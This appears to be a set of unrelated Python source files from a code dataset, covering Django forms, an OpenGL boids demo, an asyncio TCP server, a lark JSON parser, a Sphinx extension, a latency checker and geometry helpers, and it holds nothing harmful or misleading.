class AddNoteForm(forms.ModelForm):
class Meta:
model = Note
fields = ('name', 'text', 'file')
widgets = {
'name': forms.TextInput(attrs={'class': 'noteTitle', 'placeholder': 'Новая заметка'}),
'text': forms.Textarea(
attrs={'class': 'noteBody', 'cols': 100, 'rows': 20, 'placeholder': 'Текст заметки'}),
}
class AddTagForm(forms.ModelForm):
class Meta:
model = Tag
fields = ('name',)
widgets = {
'name': forms.TextInput(attrs={'class': 'noteTags'}),
}
class FilterForm(forms.Form):
date = forms.DateField(widget=forms.DateInput(attrs={'type': 'date', 'class': 'filterForms'}), required=False,
label='По дате')
tag = forms.CharField(widget=forms.TextInput(attrs={'class': 'filterForms'}), max_length=45, required=False,
label='По тегу')
class LoginUserForm(AuthenticationForm):
username = forms.CharField(widget=forms.TextInput(attrs={'class': 'loginForm', 'placeholder': 'Username'}))
password = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'loginForm', 'placeholder': '<PASSWORD>'}))
class Meta:
widgets = {
'username': forms.TextInput(attrs={'class': 'loginForm', 'placeholder': 'Username'}),
'password': forms.PasswordInput(attrs={'class': 'loginForm', 'placeholder': 'Username'}),
}
class RegisterUserForm(UserCreationForm):
password1 = forms.CharField(widget=forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': '<PASSWORD>'}))
password2 = forms.CharField(
widget=forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': 'Подтвердите пароль'}))
class Meta:
model = User
fields = ('first_name', 'last_name', 'username', '<PASSWORD>', '<PASSWORD>')
widgets = {
'first_name': forms.TextInput(attrs={'class': 'regForm', 'placeholder': 'Имя'}),
'last_name': forms.TextInput(attrs={'class': 'regForm', 'placeholder': 'Фамилия'}),
'username': forms.TextInput(attrs={'class': 'regForm', 'placeholder': 'Username'}),
'password1': forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': 'Пароль'}),
'password2': forms.PasswordInput(attrs={'class': 'regForm', 'placeholder': 'Подтвердите пароль'}),
}
help_texts = {
'username': '',
'password1': '',
'password2': '',
}
| StarcoderdataPython |
3294533 | from pathlib import Path
import random
import numpy
from pyrr import matrix44
import moderngl
import moderngl_window
from moderngl_window.opengl.vao import VAO
class Boids(moderngl_window.WindowConfig):
"""
An attempt to make something boid-list with GL3.3.
Not currently working as intended, but still creates
and interesting result.
For this to properly work we need to split the calculations
into several passes.
We are doing this the O(n^2) way with the gpu using transform feedback.
To make the data avaialble to the vertex shader (looping through it)
we copy the vertex buffer every frame to a texture.
A better way in the future is to use compute shader.
"""
title = "Boids"
resource_dir = (Path(__file__) / '../../resources').absolute()
aspect_ratio = 3440 / 1440
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
MAX_TEX_WIDTH = 8192
N = MAX_TEX_WIDTH * 1
def gen_initial_data(n, x_area=2.0, y_area=2.0):
for n in range(n):
# position
yield (random.random() - 0.5) * x_area
yield (random.random() - 0.5) * y_area
# Velocity
yield (random.random() - 0.5)
yield (random.random() - 0.5)
# Create geometry data
gen = gen_initial_data(N, x_area=self.aspect_ratio * 2 * 0.9, y_area=2.0 * 0.95)
data = numpy.fromiter(gen, count=N * 4, dtype='f4')
self.boids_buffer_1 = self.ctx.buffer(data.tobytes())
self.boids_buffer_2 = self.ctx.buffer(data=self.boids_buffer_1.read())
self.boids_vao_1 = VAO(name='boids_1', mode=moderngl.POINTS)
self.boids_vao_1.buffer(self.boids_buffer_1, '2f 2f', ['in_position', 'in_velocity'])
self.boids_vao_2 = VAO(name='boids_2', mode=moderngl.POINTS)
self.boids_vao_2.buffer(self.boids_buffer_2, '2f 2f', ['in_position', 'in_velocity'])
self.boids_texture = self.ctx.texture((MAX_TEX_WIDTH, N * 2 // MAX_TEX_WIDTH), components=2, dtype='f4')
# Programs
self.boids_render_program = self.load_program('programs/boids/boids_render.glsl')
self.boids_transform_program = self.load_program('programs/boids/boids_transform.glsl')
# Prepare for rendering
self.m_proj = matrix44.create_orthogonal_projection(
-self.aspect_ratio, self.aspect_ratio,
-1.0, 1.0,
-1.0, 1.0,
dtype='f4',
)
self.boids_render_program['m_proj'].write(self.m_proj.tobytes())
self.boids_transform_program['data'].value = 0
self.boids_transform_program['num_boids'].value = N
self.boids_transform_program['tex_width'].value = MAX_TEX_WIDTH
def render(self, time, frame_time):
self.boids_texture.use(location=0)
self.boids_transform_program['timedelta'].value = frame_time # max(frame_time, 1.0 / 60.0)
self.boids_vao_1.transform(self.boids_transform_program, self.boids_buffer_2)
self.boids_vao_2.render(self.boids_render_program)
# Swap around ..
self.boids_vao_1, self.boids_vao_2 = self.boids_vao_2, self.boids_vao_1
self.boids_buffer_1, self.boids_buffer_2 = self.boids_buffer_2, self.boids_buffer_1
# Write vertex data into texture so we can interate it in shader
self.boids_texture.write(self.boids_buffer_1.read())
if __name__ == '__main__':
moderngl_window.run_window_config(Boids)
| StarcoderdataPython |
108198 | <gh_stars>1-10
num = int(input('Type a number between 0 and 9999: '))
u = num % 10
t = num // 10 % 10
h = num // 100 % 10
th = num // 1000 % 10
print(f'Unity: {u} \n'
f'Ten: {t} \n'
f'Hundred: {h} \n'
f'Thousand: {th}')
| StarcoderdataPython |
1629975 | <gh_stars>10-100
# coding: utf-8
from asyncio import Protocol, get_event_loop
from config import cg_end_mark, cg_bytes_encoding
class TcpServer():
def __init__(self):
self.transports = set()
self.server = None
def register(self, transport):
self.transports.add(transport)
def unregister(self, transport):
self.transports.remove(transport)
def wrap(self, server):
self.server = server
tcpserver_singleton = TcpServer()
class TcpProtocol(Protocol):
"""
asyncio.Protocol 继承类 不要手动实例化\n
每个protocol 匹配一个transport\n
每个client连接会创建一个新的protocol(同时匹配一个transport)
"""
def __init__(self):
super().__init__()
self._transport = None
self.received = []
self.rev_totals = 0
self.send_totals = 0
self.state = None
def connection_made(self, transport):
self.state = "connected"
self._transport = transport
tcpserver_singleton.register(self._transport)
peername = transport.get_extra_info('peername')
print(type(peername))
print('Connection from {}'.format(peername))
def data_received(self, data):
self.received.append(data)
last_index = len(cg_end_mark)
if cg_end_mark.encode(cg_bytes_encoding) == data[-last_index:]:
complete_bdata = b"".join(self.received)
print("++++++++",len(complete_bdata),"+++++++")
from gateway import gateway_singleton
gateway_singleton.handle_tcp_request(self._transport, complete_bdata)
self.received = []
else:
print("split TCP data")
def connection_lost(self, exc):
from gateway import gateway_singleton
from utils import del_dict_item_by_value
self.state = "closed"
tcpserver_singleton.unregister(self._transport)
self._transport.close()
print("Connection lost", exc)
del_dict_item_by_value(gateway_singleton.tcp_pk_dict, self._transport)
del self
def pause_writing(self):
print(self._transport.get_write_buffer_size())
self.state = "paused"
def resume_writing(self):
print(self._transport.get_write_buffer_size())
self.state = "resumed"
class TcpService():
"""
tcp 服务抽象
"""
@staticmethod
async def create(addr):
"""
返回一个coro object
"""
loop = get_event_loop()
server = await loop.create_server(TcpProtocol, addr[0], addr[1])
tcpserver_singleton.wrap(server)
return tcpserver_singleton | StarcoderdataPython |
1713680 | <gh_stars>1-10
import lark
from lark.visitors import Transformer # pip3 install lark-parser
# EBNF
grammar = r"""
start : value
?value : "true" -> true
| "false" -> false
| "null" -> null
| array
| object
| NUMBER
| STRING
array : "[" (value ("," value)*)? "]"
object : "{" (pair ("," pair)*)? "}"
pair : STRING ":" value
%import common.ESCAPED_STRING -> STRING
%import common.SIGNED_NUMBER -> NUMBER
"""
class JSONTransformer(lark.Transformer):
def null(self, children):
return None
def false(self, children):
return False
def true(self, children):
return True
def NUMBER(self, st):
return int(st)
def STRING(self, st):
return st[1:-1]
def array(self, children):
return children
def object(self, children):
return dict(children)
def pair(self, children):
return tuple(children)
def start(self, children):
return children[0]
parser = lark.Lark(grammar)
def loads(text: str) -> object:
"""
Carrega um documento JSON e retorna o valor Python correspondente.
"""
tree = parser.parse(text)
transformer = JSONTransformer()
tree = transformer.transform(tree)
if hasattr(tree, "pretty"):
return tree.pretty()
return tree
# Exemplos
print(loads("true"))
print(loads("false"))
print(loads("null"))
print(loads("42"))
print(loads('"Hello World"'))
print(loads("[true,false,null,[1,2,3,[]]]"))
print(loads('{"answer":[1,2,[]]}'))
| StarcoderdataPython |
1657627 | <filename>combine_files.py<gh_stars>1-10
import glob2
#######################################################################
# find all file names with a .txt extension
filenames = glob2.glob('data/political_news/fake_headlines/*.txt')
# concatenate all individual files into one file
with open("fake_headlines.txt", "w", encoding="ISO-8859-1") as f:
for file in filenames:
with open(file, encoding="ISO-8859-1") as infile:
# append 'fake' parameter at end of each line
f.write(infile.read()+"\t"+"fake"+"\n")
########################################################################
# find all file names with a .txt extension
filenames = glob2.glob('data/political_news/real_headlines/*.txt')
# concatenate all individual files into one file
with open("real_headlines.txt", "w", encoding="ISO-8859-1") as f:
for file in filenames:
with open(file, encoding="ISO-8859-1") as infile:
# append 'fake' parameter at end of each line
f.write(infile.read()+"\t"+"real"+"\n")
######################################################################## | StarcoderdataPython |
3370508 | """
Functionality for declaring and cross-referencing
`Sphinx events
<https://www.sphinx-doc.org/en/master/extdev/appapi.html#sphinx-core-events>`_.
Sphinx events occur at specific points in the Sphinx build. When an event
is reached a signal is emitted with `sphinx.application.Sphinx.emit` that causes
the build to "pause" and allow any connected functionality to do the desired
processing. New functionality can be connected to an event with
`sphinx.application.Sphinx.connect` and new events can be created using
`sphinx.application.Sphinx.add_event`.
The code contained in this module was taken and adapted from the ``conf.py`` file
of `Sphinx's documentation
<https://github.com/sphinx-doc/sphinx/blob/
8653ceca0021f6ac6ff0aac6c26e2a455c6d4b21/doc/conf.py#L123-L138>`_.
.. rst:directive:: .. event:: name (signature)
A directive used for documenting Sphinx events. While this directive is not
provided by Sphinx, it is usd by Sphinx and, thus, cross-linking is provided
through the :confval:`intersphinx_mapping` configuration value with the
`sphinx.ext.intersphinx` extension.
The directive is used like...
.. code-block:: rst
.. event:: name (signature)
Event documentation.
| where ``name`` is the event name and ``signature`` represents what the
connected function's signature should look like.
.. rubric:: Example
The following example illustrates how to document the ``dummy-event`` event.
.. code-block:: rst
.. event:: dummy-event (app, node)
:param app: Instance of the Sphinx applications.
:param node: The pending node to be resolved.
This is just a dummy event for demonstration purposes.
The code renders like...
.. event:: dummy-event (app, node)
:param app: Instance of the Sphinx applications.
:param node: The pending node to be resolved.
This is just a dummy event for demonstration purposes.
.. rst:role:: event
This role is provided for easy cross-linking to an event's definition. For
example, doing ``:event:`dummy-event``` will cross-link to the
``dummy-event`` definition like :event:`dummy-event`. Or, a link to
Sphinx's ``builder-inited`` event goes like ``:event:`builder-inited``` ->
:event:`builder-inited`.
*Linking to external packages is made possible when using*
`sphinx.ext.intersphinx`.
"""
import re
from sphinx import addnodes
from sphinx.application import Sphinx
from sphinx.util.docfields import GroupedField
def parse_event(env, sig, signode):
"""
Used to set up the ``event`` directive and role for documenting Sphinx events.
Taken from the ``conf.py`` file of `Sphinx's documentation
<https://github.com/sphinx-doc/sphinx/blob/
8653ceca0021f6ac6ff0aac6c26e2a455c6d4b21/doc/conf.py#L123-L138>`_.
Parameters
----------
env : sphinx.environment.BuildEnvironment
Instance of the Sphinx's build environment.
sig : str
The "signature" given the the event directive or role. For example,
.. code-block:: rst
.. event:: foo(bar)
:event:`foo`
in the directive case ``foo(bar)`` would be the signature and in the role
case ``foo`` would be the signature.
signode : sphinx.addnodes.desc_signature
A `docutils` Node for the object signatures.
"""
event_sig_re = re.compile(r"([a-zA-Z-_]+)\s*\((.*)\)")
match = event_sig_re.match(sig)
if not match:
signode += addnodes.desc_name(sig, sig)
return sig
name, args = match.groups()
signode += addnodes.desc_name(name, name)
plist = addnodes.desc_parameterlist()
for arg in args.split(","):
arg = arg.strip()
plist += addnodes.desc_parameter(arg, arg)
signode += plist
return name
def setup(app: Sphinx) -> None:
"""
A `sphinx` ``setup()`` function setting up the :rst:dir:`event` directive
and :rst:role:`event` role.
"""
# this was taken from the sphinx conf.py file and creates the documenting
# directive `.. event::` and role `:event:` for documenting sphinx events
app.add_object_type(
directivename="event",
rolename="event",
indextemplate="pair: %s; event",
parse_node=parse_event,
doc_field_types=[
GroupedField(
"parameter",
label="Parameters",
names=("param",),
can_collapse=True,
)
],
)
| StarcoderdataPython |
3261265 | <gh_stars>1-10
#!/usr/bin/env python
import asyncio
import click
from nempy.sym.network import NodeSelector
@click.command()
@click.option('-h', '--host', 'hosts', default=tuple('google.com'), type=str, multiple=True, help='host to check latency')
@click.option('-p', '--port', default=443, help='port to check')
@click.option('-r', '--runs', default=3, help='port to check')
def main(hosts, port, runs):
loop = asyncio.get_event_loop()
for i, host in enumerate(hosts):
latency = loop.run_until_complete(NodeSelector.measure_latency(host=host, port=port, runs=runs))
if None in latency:
print(print(f'{i+1}. {host}:{port} - --'))
continue
print(f'{i+1}. {host}:{port} - {sum(latency)/runs}')
if __name__ == '__main__':
main()
| StarcoderdataPython |
6581 | <reponame>rodlukas/UP-admin<filename>admin/migrations/0041_course_color.py
# Generated by Django 2.2.3 on 2019-07-31 13:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [("admin", "0040_auto_20190718_0938")]
operations = [
migrations.AddField(
model_name="course", name="color", field=models.CharField(default="#000", max_length=7)
)
]
| StarcoderdataPython |
191262 | import numpy as np
from ccgowl.models.functions.function import Function
from ccgowl.models.functions.owl import OWL
def _get_off_diagonal_entries(x):
lt_indices = np.tril_indices_from(x, -1)
lt_indices = list(zip(*lt_indices))
return lt_indices, np.array([x[i][j] for i, j in lt_indices])
class GOWL(Function):
def eval(self, x, weights):
"""
g(X) = sum_{i=1}^p rho_i * |x|_[i]
:param x: (p x p) matrix
:param weights: weights for owl penalty
"""
nsfunc = OWL()
_, off_diagonal_entries = _get_off_diagonal_entries(x)
return nsfunc.eval(off_diagonal_entries, weights)
def gradient(self, beta, weights):
raise NotImplementedError("The OWL function is a non-smooth function. \n"
"Please call the prox function.")
def prox(self, x, weights):
"""
:param x: (p x p) matrix
:param weights: weights for owl penalty
"""
nsfunc = OWL()
lt_indices, off_diagonal_entries = _get_off_diagonal_entries(x)
prox_x = nsfunc.prox(off_diagonal_entries, weights)
for i, pair in enumerate(lt_indices):
x[pair] = prox_x[i]
return np.tril(x, -1) + np.tril(x).T
def hessian(self):
raise NotImplementedError("The OWL function is a non-smooth function. \n"
"Please call the prox function.")
| StarcoderdataPython |
3227514 | <reponame>netcadlabs/ndu-gate<gh_stars>1-10
import math
import cv2
import numpy as np
def is_inside_polygon(polygon, point):
# ref:https://stackoverflow.com/a/2922778/1266873
# int pnpoly(int nvert, float *vertx, float *verty, float testx, float testy)
# {
# int i, j, c = 0;
# for (i = 0, j = nvert-1; i < nvert; j = i++) {
# if ( ((verty[i]>testy) != (verty[j]>testy)) &&
# (testx < (vertx[j]-vertx[i]) * (testy-verty[i]) / (verty[j]-verty[i]) + vertx[i]) )
# c = !c;
# }
# return c;
# }
def pnpoly(nvert, vertx, verty, testx, testy):
i = 0
j = nvert - 1
c = False
while True:
j = i
i += 1
if i >= nvert:
break
if (verty[i] > testy) != (verty[j] > testy) and testx < (vertx[j] - vertx[i]) * (testy - verty[i]) / (
verty[j] - verty[i]) + vertx[i]:
c = not c
return c
vertx = []
verty = []
for p in polygon:
vertx.append(p[0])
verty.append(p[1])
if polygon[-1] is not polygon[0]:
p = polygon[0]
vertx.append(p[0])
verty.append(p[1])
return pnpoly(len(vertx), vertx, verty, point[0], point[1])
def is_inside_rect(rect, point):
e = 0.001
x = point[0]
if x < rect[1] - e:
return False
elif x > rect[3] + e:
return False
y = point[1]
if y < rect[0] - e:
return False
elif y > rect[2] + e:
return False
return True
def rects_intersect(rect1, rect2):
class Rectangle:
def intersects(self, other):
a, b = self, other
x1 = max(min(a.x1, a.x2), min(b.x1, b.x2))
y1 = max(min(a.y1, a.y2), min(b.y1, b.y2))
x2 = min(max(a.x1, a.x2), max(b.x1, b.x2))
y2 = min(max(a.y1, a.y2), max(b.y1, b.y2))
return x1 < x2 and y1 < y2
def _set(self, x1, y1, x2, y2):
if x1 > x2 or y1 > y2:
raise ValueError("Coordinates are invalid")
self.x1, self.y1, self.x2, self.y2 = x1, y1, x2, y2
def __init__(self, bbox):
self._set(bbox[0], bbox[1], bbox[2], bbox[3])
return Rectangle(rect1).intersects(Rectangle(rect2))
def rects_overlap(rect1, rect2, min_ratio):
w1 = rect1[2] - rect1[0]
w2 = rect2[2] - rect2[0]
w_min = min(rect1[2], rect2[2]) - max(rect1[0], rect2[0])
if (w_min / w1) >= min_ratio or (w_min / w2) >= min_ratio:
h1 = rect1[3] - rect1[1]
h2 = rect2[3] - rect2[1]
h_min = min(rect1[3], rect2[3]) - max(rect1[1], rect2[1])
return (h_min / h1) >= min_ratio or (h_min / h2) >= min_ratio
return False
def add_padding_rect(rect, padding):
x1, y1, x2, y2 = rect[0], rect[1], rect[2], rect[3]
dw = (x2 - x1) * padding
dh = (y2 - y1) * padding
return [x1 - dw, y1 - dh, x2 + dw, y2 + dh]
def distance(p1, p2):
return math.sqrt((p1[0] - p2[0]) ** 2 + (p1[1] - p2[1]) ** 2)
def get_rect_values(rect):
# y1, x1, y2, x2
return rect[0], rect[1], rect[2], rect[3]
def get_rect_pnts(rect):
# p1, p2
return (rect[1], rect[0]), (rect[3], rect[2])
def get_rect(p1, p2):
return [p1[1], p1[0], p2[1], p2[0]]
def get_rect_bottom_center(rect):
r1 = rect[1]
r2 = rect[2]
r3 = rect[3]
return int(r1 + (r3 - r1) * 0.5), r2 # bottom center
def get_dist_sq(p1, p2):
d1 = p2[0] - p1[0]
d2 = p2[1] - p1[1]
return d1 * d1 + d2 * d2
def get_center_int(pnts):
x = 0
y = 0
for pnt in pnts:
x += pnt[0]
y += pnt[1]
length = float(len(pnts))
return [int(x / length), int(y / length)]
| StarcoderdataPython |
Subsets and Splits